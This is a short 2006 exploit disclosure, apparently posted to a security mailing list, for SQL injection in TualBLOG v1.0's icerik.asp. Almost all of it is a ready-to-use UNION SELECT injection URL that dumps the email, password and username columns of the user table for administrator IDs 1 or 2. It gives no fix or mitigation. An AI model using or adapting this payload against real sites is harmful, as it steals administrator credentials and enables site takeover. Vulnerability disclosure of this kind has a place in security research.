TualBLOG v 1.0 multiple sql injection

Wed, 13 Sep 2006 12:42:13 -0700 

# BiyoSecurity.Org


# script name : TualBLOG v 1.0 


# Risk : High


# Regards : Dj ReMix


# Thanks : Korsan , Liz0zim


# Vulnerable file : icerik.asp


exp :


http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1



uyeno = 1 or 2( Admin ID )


Bye :=)

Reply via email to